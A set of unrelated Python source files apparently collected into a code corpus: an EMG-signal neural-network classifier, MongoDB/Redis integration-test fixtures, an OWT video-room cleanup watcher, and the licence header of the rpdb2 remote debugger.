                        urllib.request.urlretrieve(url, f"Last Article Picture {img_num}.jpg")#For Downloading Pictures to same directory uncomment to activate.
                        img_num+=1
                        time.sleep(1)
                        response = requests.get(url)
                        img = Image.open(BytesIO(response.content))
                        img.show()
                    except:
                        time.sleep(1)
                        continue
            stat=input(l_exit)
            if stat=="quit" or stat=="çık":
                os._exit(1)
            else:
                continue
    except:
        pass
def clear():
    """Clear the terminal screen ('cls' on Windows, 'clear' elsewhere)."""
    command = 'cls' if os.name == 'nt' else 'clear'
    os.system(command)
if __name__ == "__main__":
    # Run the interactive search loop on a worker thread.
    threading.Thread(target=x).start()
EMG_DPNN.py | # -*- coding: utf-8 -*-
"""
Created on Fri Aug 24 09:40:28 2018
@author: Paulo Augusto
"""
import numpy as np
#from numpy import fft
import matplotlib.pyplot as plt
#import scipy.signal as sig
import os
import random
import emgReaderClass_v2 as erc
import threading
import multiprocessing
#import dataPlotter
import snkbrain
import scipy.stats as st
import cProfile
import re
# This script is compatible with 'emgReaderClass_v2', that
# reads the .csv files generated by 'movementSaver.m', from
# the folder './csv/'
profiling=False # Enable cProfile-based profiling of the run
bias=0 # If bias = 1, every cromossome will have a non frequency dependant DNA
maxGen=2000 # The max number of generations
startOver=True# If True, the code will not consider the last simulation
tamPop=30 # Population number
maxFreq=240 # This is the max Frequency to consider #240
freqStep=3 # For freqStep=3 -> The code will consider [1,2,3],[3,4,5], etc# 3
sourceType='ninapro'
ninaprofolders=['csv1','csv2','csv3','csv6','csv7','csv8'] # NinaPro csv folders to load
fs=2000 # Sampling frequency in Hz
##############################################################################
guid=0 # Individual ID (logging variable)
log_val,log_train,log_test=[],[],[] # Per-run learning-curve logs
param=[] # Feature vectors derived from the signals below
real=[] # DATA
origin=[] # DATA
fv=[] # DATA
frv=[] # DATA
max_freq=240 # Upper band limit (Hz) used by adjust()
min_freq=6 # Lower band limit (Hz) used by adjust()
# Portuguese-named aliases for the statistical feature functions:
# kurtosis, skewness, variance, mean, standard deviation.
curtose = st.kurtosis
obliquidade = st.skew
variancia = np.var
media = np.mean
desvio_padrao = np.std
def rms(v):
    """Root-mean-square value of the sequence *v*."""
    return np.sqrt(sum(x * x for x in v) / len(v))
def centroide_espectral(v):
    """Spectral centroid of *v* using 1-based bin indices as frequencies."""
    weighted = sum(idx * amp for idx, amp in enumerate(v, start=1))
    return float(weighted) / sum(v)
def feature_scaling(v):
    """Standardize *v*: subtract its mean and divide by its standard deviation."""
    centered = np.asarray(v, dtype=float) - np.mean(v)
    return centered / desvio_padrao(v)
#def get_parameters(timeValues,freqValues):
# global max_freq,min_freq
# max_i=int(max_freq*len(freqValues)/fs)
# min_i=int(min_freq*len(freqValues)/fs)
# mf=np.max([abs(a) for a in freqValues[min_i:max_i]])
# mt=np.max([abs(a) for a in timeValues[min_i:max_i]])
# imp_freq=[a*2/(len(freqValues)) for a in freqValues[min_i:max_i]]
# imp_freq=freqValues
# tyme=[a/(1000) for a in timeValues]
#
# temp=[curtose(tyme),
# obliquidade(tyme),
# variancia(tyme),
# media(tyme),
# desvio_padrao(tyme),
# rms(tyme)]
# return temp
def get_parameters(timeValues, freqValues):
    """Build the 12-element feature vector for one signal.

    Time-domain features (on timeValues/1000): kurtosis, skew, variance,
    mean, std.  Frequency-domain features (on freqValues/1000): spectral
    centroid/10, kurtosis, skew, variance, mean, std, RMS.
    """
    freq = [a / (1000) for a in freqValues]
    tyme = [a / (1000) for a in timeValues]
    time_feats = [curtose(tyme),
                  obliquidade(tyme),
                  variancia(tyme),
                  media(tyme),
                  desvio_padrao(tyme)]
    freq_feats = [centroide_espectral(freq) / 10,
                  curtose(freq),
                  obliquidade(freq),
                  variancia(freq),
                  media(freq),
                  desvio_padrao(freq),
                  rms(freq)]
    return time_feats + freq_feats
# Individual class
class ind:
    """One evolving individual: a unique id, a fitness score and a neural net.

    Args:
        layers: layer sizes passed straight to snkbrain.brain.
        biases: per-layer bias flags passed straight to snkbrain.brain.
    """
    def __init__(self,layers,biases):
        global guid
        self.uid=guid # globally unique id taken from the module counter
        guid+=1
        self.fit=-1000 # sentinel fitness until evaluated
        self.brain=snkbrain.brain(layers,biases)
def getParameters():
    """Populate the global feature matrix `param` from the raw signals (`real`)
    and their binned frequency vectors (`frv`), one feature vector per repetition."""
    global param
    param=[[get_parameters(realV,freqV) for realV,freqV in zip(sr,sf)] for sr,sf in zip(real,frv)]
#    param=[[get_parameters(realV,freqV) for realV,freqV in zip(sr,sf)] for sr,sf in zip(real,frv)]
def feature_scaling_all():
    """Standardize all four global data sets in place with one shared mean/std.

    The statistics are computed over every scalar of flx_train, flx_test,
    ext_train and ext_test, then each value is replaced by (x - mean) / std.
    Python 2 only (uses a print statement).
    """
    global flx_train,flx_test,ext_train,ext_test
    data_sets=[flx_train,flx_test,ext_train,ext_test]
    all_data=[]
    # Flatten every scalar of every repetition of every archive into one list.
    for data_set in data_sets:
        for arq in data_set:
            for data in arq:
                for data_piece in data:
                    all_data.append(data_piece)
    dp=desvio_padrao(all_data)
    mn=media(all_data)
    print dp,mn
    # In-place standardization, element by element.
    for i in range(0,len(data_sets)):
        for j in range(0,len(data_sets[i])):
            for k in range(0,len(data_sets[i][j])):
                data_sets[i][j][k]=(data_sets[i][j][k]-mn)/dp
# This function takes the fft data od an signal, and returns a similar vector,
# but instead of getting one element per frequency it take a number of freqStep
# frequencies, sum it and divide by freqStep
def getFreqVector(fv):
    """Bin an FFT magnitude vector: sum groups of `freqStep` adjacent
    frequencies up to `maxFreq` Hz, each group scaled by 2/len(fv)."""
    total = float(len(fv))
    norm = int(np.ceil(total * 1 / fs))
    step = freqStep * norm
    return [sum(fv[j:j + step]) * 2 / total
            for j in range(0, norm * maxFreq, step)]
def adjust(v):
    """Trim *v* (an FFT vector sampled at `fs` Hz) to the 6-240 Hz band.

    Bug fix: the original assigned the slice to the local `v` and returned
    None, so the trimming was silently lost at every call site; the trimmed
    vector is now returned.
    """
    max_freq = 240
    min_freq = 6
    max_i = int(max_freq * len(v) / fs)
    min_i = int(min_freq * len(v) / fs)
    return v[min_i:max_i]
# Read the data archives. The original signal is stored in origin. Each signal
# Is stored in real. real[arq][5] will contain the 5th signal of the arq'th file
# (as read by getArqs). The fft data will be stored at "fv" (indexes works the
# the same as for "real"). The frequency vector as got by getFrequencyVector
# is stored at frv
def readArqs(source,muscle,interval):
    """Load EMG repetitions into the global real/fv/frv structures.

    Args:
        source (str): data source identifier; only 'ninapro' is handled.
        muscle: muscle/channel selector forwarded to the csv reader.
        interval (tuple): (start, stop) slice applied to each file's repetitions.
    """
    it=interval
    reader=erc.emgReader()
    global real,fv,frv
    if source=='ninapro':
        global ninaprofolders
        realt,fvt=[],[]
        # One (time-domain, fft) data pair per NinaPro folder.
        for folder in ninaprofolders:
            realt.append([])
            fvt.append([])
            realt[-1],fvt[-1]=reader.getCsvData(muscle,folder)
        # Merge the per-folder repetitions of each archive, keeping only the
        # requested interval of repetitions.
        for arq in range(0,len(realt[0])):
            real.append([])
            fv.append([])
            for r,f in zip(realt,fvt):
                real[arq].extend(r[arq][ it[0]:it[1] ])
                fv[arq].extend(f[arq][ it[0]:it[1] ])
        # Keep only the six selected movements (1-based ids -> 0-based index).
        training=[18-1,21-1,22-1,25-1,26-1,31-1]
        real=[real[i] for i in training]
        fv=[fv[i] for i in training]
    # Binned frequency vector for every repetition of every archive.
    frv=[[getFreqVector(rep) for rep in arq]for arq in fv]
#    for arq in range(0,len(fv)):
#        frv.append([])
#        for i in range(0,len(fv[arq])):
#            frv[arq].append(getFreqVector(fv[arq][i]))
# Fitness method. Each signal frequency vector is multiplied by indiv
# chromossome. The numbers got are reconized as the score of each archive.
# Let's say that the 0th element gets the largest number. That mean this
# individual "thinks" that that signal belongs to archive 4 (getArqs()[0])
# The fitness is then calculated by the number of right guesses of each
# individual
def fitness(indiv,dp=False,indivs=None):
    """Cross-entropy-style score of `indiv` over the global feature set.

    For every sample the network output is compared against a one-hot target
    for its archive index; log-likelihood terms are accumulated (higher is
    better, values are <= 0).

    Args:
        indiv (ind): individual whose brain is evaluated.
        dp (bool): if True, feed the concatenated outputs of two first-stage
            networks (`indivs[0]` on ext_train, `indivs[1]` on flx_train)
            instead of the raw features.
        indivs: pair of first-stage individuals, required when dp is True.
    """
    global nArq
    score=0
    for arq in range(0,len(param)):
        for i in range(0,len(param[arq])):
            tam=len(param[arq][i])
#            inpt=frv[arq][i]
            if not dp:
                inpt=param[arq][i]
            else:
                # Two-stage setup: decision net consumes both stage-1 outputs.
                l,o1=indivs[0].brain.run(ext_train[arq][i])
                l,o2=indivs[1].brain.run(flx_train[arq][i])
                inpt=[a for a in o1]
                inpt.extend([a for a in o2])
            l,pont= indiv.brain.run(inpt)#np.array(frv[arq][i])*indiv.cromo.freqFactor
            # Binary cross-entropy against the one-hot target `ref`.
            def error(pont,ref):
                score=0
                for i in range(0,len(pont)):
                    if i==ref:
                        t=1
                    else:
                        t=0
                    score+= t * np.log(pont[i]) + (1-t) * np.log(1-pont[i])
#                    score+= t*np.log((pont[i]+1)/2)+(1-t)*np.log(1-(pont[i]+1)/2)
                return score
            score+=error(pont,arq)
    return score
def trainSomeone(indiv,number,learning_rate):
    """Backprop-train `indiv` on the global `param` set.

    The target for each sample is a one-hot vector (6 classes) selecting its
    archive index.
    NOTE(review): `count` is assumed to advance once per full sweep, i.e.
    `number` counts sweeps over the data — confirm against the original
    indentation of `count+=1`.
    """
    global param
    count=0
    while count<number:
        for arq in range(0,len(param)):
            for i in range(0,len(param[arq])):
                target=[0,0,0,0,0,0]
                target[arq]=1
                indiv.brain.train(param[arq][i],target,learning_rate)
        count+=1
def trainSomeone_2(rn,indiv1,indiv2,number,learning_rate):
    """Train decision network `rn` on concatenated first-stage outputs.

    NOTE(review): both feature halves are produced by `indiv1`; `indiv2` is
    never used, while fitness() feeds indivs[0]/indivs[1] — the second call
    likely should be `indiv2.brain.run(flx_train[arq][i])`; confirm intent
    before changing.
    NOTE(review): as in trainSomeone, `count+=1` is assumed to be at
    while-body level (one increment per sweep) — confirm.
    """
    global param
    count=0
    while count<number:
        for arq in range(0,len(param)):
            for i in range(0,len(param[arq])):
                target=[0,0,0,0,0,0]
                target[arq]=1
                l,o1=indiv1.brain.run(ext_train[arq][i])
                l,o2=indiv1.brain.run(flx_train[arq][i])
                f=[a for a in o1]
                f.extend([a for a in o2])
#                f=[0,0,0, 0,0,0, 0,0,0, 0,0,0]
#                f[arq],f[arq+6]=1,1
                rn.brain.train(f,target,learning_rate)
        count+=1
# Ver acertos
def get_score(ind, data):
    """Fraction of samples whose argmax network output matches their class index."""
    hits = 0
    total = 0
    for arq, samples in enumerate(data):
        for sample in samples:
            total += 1
            _, output = ind.brain.run(sample)
            if np.argmax(output) == arq:
                hits += 1
    return float(hits) / total
#score=0
#total=0
#for arq in range(0,len(real)):
# for i in range(0,len(fv[arq])):
# total+=1
# l,o1=a.brain.run(ext_test[arq][i])
# l,o2=b.brain.run(flx_test[arq][i])
# f=[j for j in o1]
# f.extend([j for j in o2])
# l,o=c.brain.run(f)
# if np.argmax(o)==arq:
# score+=1
# else:
# print arq,i
#print score,' de ',total
def treinar(ind, init_lr, goal, dp=False, indivs=None):
    # Adaptive-learning-rate training loop: trains *ind* until its fitness
    # reaches *goal*, shrinking the rate (and rolling the weights back)
    # whenever fitness drops, and slowly growing it while it improves.
    #
    # ind     -- individual to train (its brain weights are mutated in place).
    # init_lr -- starting learning rate; also the reset value after a streak
    #            of failed steps.
    # goal    -- target fitness (log-likelihood, typically negative).
    # dp      -- when True, train via trainSomeone_2 using the two
    #            first-stage individuals in *indivs*.
    # Returns the last learning rate used.
    global bestAll, tamPop  # NOTE(review): neither global is used below
    last = -1000
    count = 0
    lr = init_lr
    errorcount = 0
    flag = 0
    f = -1000
    # Snapshot of the weight matrices, used to roll back a bad step.
    lastbrain = [a.copy() for a in ind.brain.brainMatrixes]
    while f < goal:
        f = fitness(ind, dp=dp, indivs=indivs)
        if last > f:
            # Fitness got worse: damp the rate and restore the snapshot.
            # NOTE(review): this rebinds brainMatrixes to the snapshot list
            # itself (no copy), so the next training step mutates the
            # snapshot in place -- confirm this aliasing is intended.
            lr /= 1.1
            errorcount += 1
            ind.brain.brainMatrixes = lastbrain
        else:
            lastbrain = [a.copy() for a in ind.brain.brainMatrixes]
            errorcount = 0
            count += 1
            if count == 11:
                # After 11 consecutive non-worsening steps, grow the rate.
                lr *= 1.03
                count = 0
        if errorcount == 3:
            if flag >= 3:
                print 'to many errors'
                break
            else:
                # Up to 3 times: reset the rate to its initial value and retry.
                flag += 1
                lr = init_lr
                errorcount = 0
        if dp:
            trainSomeone_2(ind, indivs[0], indivs[1], 10, lr)
        else:
            trainSomeone(ind, 100, lr)
        last = f
        print f, lr  # previously also logged get_score(ind, ext_train/ext_test)
    return lr
def treinar_v(a, init, reset_log=False):
    # Fixed-length (3000-iteration) training run that records train/test
    # accuracy each iteration, for producing the learning curves that
    # print_all() plots (each iteration = 5 epochs, hence the step-5 x axis).
    #
    # a         -- individual to train.
    # init      -- constant learning rate passed to trainSomeone.
    # reset_log -- when True, clear the accumulated log lists first.
    global ext_train, flx_train, ext_test, flx_test, param, param_test, param_vald, log_vald, log_train, log_test, ind_count
    if reset_log:
        log_vald, log_train, log_test = [], [], []
    # Build the held-out test set from the concatenated ext/flx test data.
    concatenate(ext_test, flx_test)
    param_test = [[[data for data in rep] for rep in arq] for arq in param]
    log_train.append([])
    log_test.append([])
    # Switch the global ``param`` back to the concatenated training data.
    concatenate(ext_train, flx_train)
    count = 0.0
    while count < 3000:
        count += 1
        if count % 100 == 0:
            # Progress report every 100 iterations (count/30 == percent done).
            print 'Log numero ', len(log_train), ' ', count / 30, '% completo'
        log_train[-1].append(get_score(a, param))
        log_test[-1].append(get_score(a, param_test))
        trainSomeone(a, 5, init)
def search_candidates():
    """Train a fixed list of candidate network topologies with treinar_v.

    Populates the global ``inds`` list with one individual per topology and
    advances the global ``ind_count`` once per trained candidate.

    BUG FIX: ``ind_count`` is incremented below, so it must be declared
    global here; the original only declared ``inds`` and would raise
    UnboundLocalError on the first increment.
    """
    global inds, ind_count
    # (layer sizes, activation flags) per candidate topology.
    topologies = [
        ([24, 24, 6], [1, 1, 0]),
        ([24, 20, 6], [1, 1, 0]),
        ([24, 16, 6], [1, 1, 0]),
        ([24, 12, 6], [1, 1, 0]),
        ([24, 16, 6], [1, 0, 0]),
        ([24, 24, 20, 6], [1, 1, 1, 0]),
        ([24, 20, 16, 6], [1, 1, 1, 0]),
        ([24, 16, 12, 6], [1, 1, 1, 0]),
        ([24, 20, 16, 6], [1, 0, 0, 0]),
    ]
    inds = [ind(layers, flags) for layers, flags in topologies]
    for indiv in inds:
        treinar_v(indiv, 0.005)
        ind_count += 1
#def get_all_parameters():
#
# global flx_train,flx_test,ext_train,ext_test
#
# def a1():
# global ext_test
# r1,f1=readArqs('ninapro','ext',[3,6])
# ext_test=getParameters(r1,f1)
# print 'done'
#
# def a2():
# global flx_test
# r2,f2=readArqs('ninapro','flx',[3,6])
# flx_test=getParameters(r2,f2)
# print 'done'
#
# def a3():
# global ext_train
# r3,f3=readArqs('ninapro','ext',[0,3])
# ext_train=getParameters(r3,f3)
# print 'done'
#
# def a4():
# global flx_train
# r4,f4=readArqs('ninapro','flx',[0,3])
# flx_train=getParameters(r4,f4)
# print 'done'
#
# threading.Thread(target=a1).start()
# threading.Thread(target=a2).start()
# threading.Thread(target=a3).start()
# threading.Thread(target=a4).start()
def concatenate(v1, v2):
    """Rebuild the global ``param`` by joining *v1* and *v2* element-wise.

    ``param[i][j]`` becomes a fresh list holding v1[i][j] followed by
    v2[i][j]; v1 and v2 themselves are left untouched.
    """
    global param
    param = [[list(rep) for rep in arq] for arq in v1]
    for i, arq in enumerate(v2):
        for j, rep in enumerate(arq):
            param[i][j].extend(rep)
def get_all_parameters():
    """Load flx and ext data and split each archive into train/test sets.

    Every third repetition (index % 3 == 2) goes to the test set, the rest
    to the training set. Results land in the globals ``flx_train``,
    ``flx_test``, ``ext_train`` and ``ext_test``; finally the data is
    feature-scaled via feature_scaling_all().
    """
    global flx_train, flx_test, ext_train, ext_test

    def _split(dataset):
        # BUG FIX: the original recovered the repetition index with
        # ``arq.index(rep)``, which returns the index of the *first* equal
        # element -- wrong whenever two repetitions compare equal, and
        # O(n^2) besides. enumerate() gives the true index in one pass.
        test = [[list(rep) for k, rep in enumerate(arq) if k % 3 == 2]
                for arq in dataset]
        train = [[list(rep) for k, rep in enumerate(arq) if k % 3 != 2]
                 for arq in dataset]
        return train, test

    readArqs('ninapro', 'flx', [0, 6])
    getParameters()
    flx_train, flx_test = _split(param)
    readArqs('ninapro', 'ext', [0, 6])
    getParameters()
    ext_train, ext_test = _split(param)
    feature_scaling_all()
# readArqs('ninapro','ext',[3,6])
# getParameters()
# ext_test=[[[data for data in rep] for rep in arq] for arq in param]
def print_all():
    """Plot and save one train/test accuracy curve per logged run.

    Figures are written as '<movements>_<letter>.png' where <letter> is
    'A', 'B', ... for run 0, 1, ...
    """
    global log_train, log_test
    movement_tag = ''
    for mov in [18, 21, 22, 25, 26, 31]:
        movement_tag += str(mov) + '_'
    for i, test_curve in enumerate(log_test):
        train_curve = log_train[i]
        letter = chr(ord('A') + i)
        plt.figure()
        plt.plot(range(0, len(train_curve) * 5, 5), train_curve, 'r')
        plt.plot(range(0, len(test_curve) * 5, 5), test_curve, 'b')
        plt.grid()
        plt.title('NN Topology ' + letter)
        plt.legend(['Training', 'Testing'])
        plt.grid(True)
        plt.xlabel('Epoch')
        plt.ylabel('Percentage')
        plt.savefig(movement_tag + letter + '.png')
# Entry point: profile main() under cProfile when the ``profiling`` flag is
# set; otherwise do nothing (the direct main() call is currently disabled).
if profiling:
    cProfile.run('main()')
else:
    1  # no-op placeholder
    # main()
|
integration_test_support.py | """
This module provides a IntegrationTestServerFixture which runs a
IntegrationTestServer on "http://127.0.0.1:5000/".
"""
import atexit
import os
import shutil
import subprocess
import tempfile
import time
from multiprocessing import Process
from time import sleep
import pymongo
import redis
import requests
from pyfix import Fixture
from pymongo.errors import ConnectionFailure
import integrationtest_utils
from aries.core.db import mongodb
from aries.core.db.mongodb import MongoDB
from aries.core.event.event_queue import EventQueue
MONGODB_TEST_PORT = 12345
REDIS_TEST_PORT = 12346
os.environ['MONGO_URI'] = 'mongodb://mongo:27017'
os.environ['REDIS_HOST'] = 'redis'
os.environ['REDIS_PORT'] = '6379'
import aries.api.webapp as webapp
class IntegrationTestServer(object):
    """Runs the aries web application on http://127.0.0.1:5000/ in a child
    process, backed by the temporary MongoDB and Redis singletons."""

    def __init__(self):
        # Bring up (or reuse) the singleton test databases first so the
        # web app can connect to them.
        mongodb_client = MongoTemporaryInstance.get_instance().client
        redis_client = RedisTemporaryInstance.get_instance().client
        self.event_queue = EventQueue(redis=redis_client)
        self.storage = MongoDB(client=mongodb_client)
        # NOTE(review): fixed sleeps to let the backends settle / the
        # Flask dev server start listening -- inherently racy.
        sleep(1)
        app = webapp.create_app()
        self._process = Process(target=app.run)
        self._process.start()
        sleep(1)

    def stop(self):
        # Terminate the web-app child process.
        self._process.terminate()

    def get_page(self, url):
        # GET *url* (path only, e.g. '/status') from the test server.
        return requests.get('http://127.0.0.1:5000' + url)

    def post_page(self, url, data):
        # POST *data* as a JSON body to *url* on the test server.
        return requests.post(url='http://127.0.0.1:5000' + url, json=data)
class IntegrationTestServerFixture(Fixture):
    """pyfix fixture that provides a running IntegrationTestServer and
    stops it again once the test is done."""

    def reclaim(self, integration_test_server):
        # Called by pyfix after the test: shut the server process down.
        integration_test_server.stop()

    def provide(self):
        # Called by pyfix before the test: start a fresh server.
        return [IntegrationTestServer()]
class MongoTemporaryInstance(object):
    """Singleton to manage a temporary MongoDB instance.

    Use this for testing purpose only. The instance is automatically
    destroyed at the end of the program. When ``mongodb_test_url()`` names
    an external server, that server is reused (and its test database
    dropped) instead of spawning a local ``mongod``.
    """
    _instance = None

    @classmethod
    def get_instance(cls):
        """Return the shared instance, creating it on first use."""
        if cls._instance is None:
            cls._instance = cls()
            # Make sure any spawned mongod dies with the program.
            atexit.register(cls._instance.shutdown)
        return cls._instance

    def __init__(self):
        # BUG FIX: initialize the process/tempdir handles up front so
        # shutdown() cannot raise AttributeError when the external-URL
        # branch is taken (the original set them only in the else branch).
        self._process = None
        self._tmpdir = None
        self._devnull = None
        if integrationtest_utils.mongodb_test_url():
            self._client = pymongo.MongoClient(integrationtest_utils.mongodb_test_url())
            # Start every test run from an empty database.
            self._client.drop_database(mongodb.DATABASE)
        else:
            self._tmpdir = tempfile.mkdtemp()
            # Keep a handle on the null sink so it can be closed on
            # shutdown (the original leaked the file object).
            self._devnull = open(os.devnull, 'wb')
            self._process = subprocess.Popen(['mongod', '--bind_ip', 'localhost',
                                              '--port', str(MONGODB_TEST_PORT),
                                              '--dbpath', self._tmpdir,
                                              '--nojournal',
                                              '--noauth', '--smallfiles',
                                              '--syncdelay', '0',
                                              '--maxConns', '10',
                                              '--nssize', '1', ],
                                             stdout=self._devnull,
                                             stderr=subprocess.STDOUT)
            # Mongo is usually ready almost immediately; retry connecting
            # a few times before giving up.
            for _ in range(3):
                time.sleep(0.1)
                try:
                    self._client = pymongo.MongoClient('localhost', MONGODB_TEST_PORT)
                except ConnectionFailure:
                    continue
                else:
                    break
            else:
                self.shutdown()
                assert False, 'Cannot connect to the mongodb test instance'

    @property
    def client(self):
        """The connected pymongo client."""
        return self._client

    def shutdown(self):
        """Terminate the spawned mongod (if any) and remove its data dir."""
        if self._process:
            self._process.terminate()
            self._process.wait()
            self._process = None
            shutil.rmtree(self._tmpdir, ignore_errors=True)
            self._tmpdir = None
        if self._devnull:
            self._devnull.close()
            self._devnull = None
class RedisTemporaryInstance(object):
    """Singleton to manage a temporary Redis instance.

    Use this for testing purpose only. The instance is automatically
    destroyed at the end of the program. When ``redis_test_url()`` names an
    external server, that server is reused instead of spawning a local
    ``redis-server``.
    """
    _instance = None

    @classmethod
    def get_instance(cls):
        """Return the shared instance, creating it on first use."""
        if cls._instance is None:
            cls._instance = cls()
            # Make sure any spawned redis-server dies with the program.
            atexit.register(cls._instance.shutdown)
        return cls._instance

    def __init__(self):
        # BUG FIX: initialize the handles up front so shutdown() cannot
        # raise AttributeError when the external-URL branch is taken.
        self._process = None
        self._tmpdir = None
        self._devnull = None
        if integrationtest_utils.redis_test_url():
            self._client = redis.Redis(integrationtest_utils.redis_test_url(), integrationtest_utils.redis_test_port())
        else:
            self._tmpdir = tempfile.mkdtemp()
            # Keep a handle on the null sink so it can be closed on
            # shutdown (the original leaked the file object).
            self._devnull = open(os.devnull, 'wb')
            self._process = subprocess.Popen(['redis-server',
                                              '--port', str(REDIS_TEST_PORT)],
                                             stdout=self._devnull,
                                             stderr=subprocess.STDOUT)
            # Redis is usually ready almost immediately; retry connecting
            # a few times before giving up.
            for _ in range(3):
                time.sleep(0.1)
                try:
                    self._client = redis.Redis('localhost', REDIS_TEST_PORT)
                except ConnectionFailure:
                    # NOTE(review): ConnectionFailure is pymongo's exception;
                    # redis client errors derive from redis.exceptions, so
                    # this retry guard likely never fires -- confirm intent.
                    continue
                else:
                    break
            else:
                self.shutdown()
                assert False, 'Cannot connect to the redis test instance'

    @property
    def client(self):
        """The connected redis client."""
        return self._client

    def shutdown(self):
        """Terminate the spawned redis-server (if any) and clean up."""
        if self._process:
            self._process.terminate()
            self._process.wait()
            self._process = None
            # The original never removed the temp dir -- clean it up too.
            shutil.rmtree(self._tmpdir, ignore_errors=True)
            self._tmpdir = None
        if self._devnull:
            self._devnull.close()
            self._devnull = None
|
watcher.py | #!/usr/bin/python3
from threading import Thread, Event
from owtapi import OWTAPI
from configuration import env
import time
inactive_time=float(env["INACTIVE_TIME"])
class RoomWatcher(object):
    """Tracks OWT rooms and tears down rooms that stay empty too long.

    A background thread polls the participant count of every registered
    room; a room with no participants for more than *inactive* seconds is
    deleted on the OWT server and forgotten locally.
    """

    def __init__(self, inactive=inactive_time, stop=None):
        """inactive -- idle seconds before a room is reclaimed.
        stop -- optional threading.Event used to stop the cleanup thread.

        BUG FIX: the original default was ``stop=Event()``, evaluated once
        at definition time, so every watcher created without an explicit
        event shared one mutable Event; a fresh Event is now created per
        instance.
        """
        super(RoomWatcher, self).__init__()
        self._stop = stop if stop is not None else Event()
        self._inactive = inactive
        self._rooms = {}
        # NOTE(review): non-daemon thread -- it keeps the process alive
        # until self._stop is set; confirm that is intended.
        Thread(target=self._cleanup_thread).start()

    def get(self, name):
        """Return (room, stream) for *name*, or (None, None) if unknown."""
        if name not in self._rooms:
            return (None, None)
        entry = self._rooms[name]
        return (entry["room"], entry["stream"])

    def set(self, name, room, stream=None):
        """Register *room* under *name*; first registration wins."""
        if name in self._rooms:
            return
        self._rooms[name] = {
            "room": room,
            "stream": stream,
            "time": int(time.time()),
        }

    def _cleanup_thread(self):
        # Poll loop: refresh the activity timestamp of occupied rooms and
        # delete rooms that have been empty longer than the threshold.
        owt = OWTAPI()
        while not self._stop.is_set():
            todelete = []
            # Snapshot the keys: set() may add entries from another thread
            # while we iterate (the original iterated the live dict).
            for name in list(self._rooms):
                try:
                    participants = owt.list_participants(self._rooms[name]["room"])
                except Exception:
                    # Treat an unreachable API as "empty" so stale rooms
                    # still age out.
                    participants = 0
                now = int(time.time())
                print("Watcher: room {} participant {} inactive {}".format(name, participants, now - self._rooms[name]["time"]), flush=True)
                if participants > 0:
                    self._rooms[name]["time"] = now
                elif now - self._rooms[name]["time"] > self._inactive:
                    todelete.append(name)
            for name in todelete:
                room1 = self._rooms[name]["room"]
                # (Dropped a vestigial owt.list_streams() call whose result
                # only fed commented-out per-stream deletion code.)
                print("Remove room {}:{}".format(name, room1), flush=True)
                try:
                    owt.delete_room(room1)
                except Exception:
                    pass
                self._rooms.pop(name, None)
            self._stop.wait(self._inactive / 3.0)
|
rpdb2.py | #! /usr/bin/env python
"""
rpdb2.py - version 2.4.8
A remote Python debugger for CPython
Copyright (C) 2005-2009 Nir Aides
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02111-1307 USA
"""
COPYRIGHT_NOTICE = """Copyright (C) 2005-2009 Nir Aides"""
CREDITS_NOTICE = """Work on version 2.4.8 was sponsored by Investortools, Inc."""
LICENSE_NOTICE = """
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
A copy of the GPL with the precise terms and conditions for
copying, distribution and modification follow:
"""
COPY_OF_THE_GPL_LICENSE = """
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0.
This License applies to any program or other work which contains a notice
placed by the copyright holder saying it may be distributed under the terms
of this General Public License. The "Program", below, refers to any such
program or work, and a "work based on the Program" means either the Program
or any derivative work under copyright law: that is to say, a work containing
the Program or a portion of it, either verbatim or with modifications and/or
translated into another language. (Hereinafter, translation is included
without limitation in the term "modification".) Each licensee is addressed
as "you".
Activities other than copying, distribution and modification are not covered
by this License; they are outside its scope. The act of running the Program
is not restricted, and the output from the Program is covered only if its
contents constitute a work based on the Program (independent of having been
made by running the Program). Whether that is true depends on what the
Program does.
1.
You may copy and distribute verbatim copies of the Program's source code as
you receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice and
disclaimer of warranty; keep intact all the notices that refer to this
License and to the absence of any warranty; and give any other recipients of
the Program a copy of this License along with the Program.
You may charge a fee for the physical act of transferring a copy, and you
may at your option offer warranty protection in exchange for a fee.
2.
You may modify your copy or copies of the Program or any portion of it, thus
forming a work based on the Program, and copy and distribute such modifications
or work under the terms of Section 1 above, provided that you also meet all
of these conditions:
a) You must cause the modified files to carry prominent notices stating
that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in whole
or in part contains or is derived from the Program or any part thereof,
to be licensed as a whole at no charge to all third parties under the
terms of this License.
c) If the modified program normally reads commands interactively when
run, you must cause it, when started running for such interactive use in
the most ordinary way, to print or display an announcement including an
appropriate copyright notice and a notice that there is no warranty (or
else, saying that you provide a warranty) and that users may redistribute
the program under these conditions, and telling the user how to view a
copy of this License. (Exception: if the Program itself is interactive
but does not normally print such an announcement, your work based on the
Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If identifiable
sections of that work are not derived from the Program, and can be reasonably
considered independent and separate works in themselves, then this License,
and its terms, do not apply to those sections when you distribute them as
separate works. But when you distribute the same sections as part of a whole
which is a work based on the Program, the distribution of the whole must be
on the terms of this License, whose permissions for other licensees extend to
the entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest your
rights to work written entirely by you; rather, the intent is to exercise the
right to control the distribution of derivative or collective works based on
the Program.
In addition, mere aggregation of another work not based on the Program with
the Program (or with a work based on the Program) on a volume of a storage or
distribution medium does not bring the other work under the scope of this
License.
3. You may copy and distribute the Program (or a work based on it, under
Section 2) in object code or executable form under the terms of Sections 1
and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable source
code, which must be distributed under the terms of Sections 1 and 2 above
on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three years, to
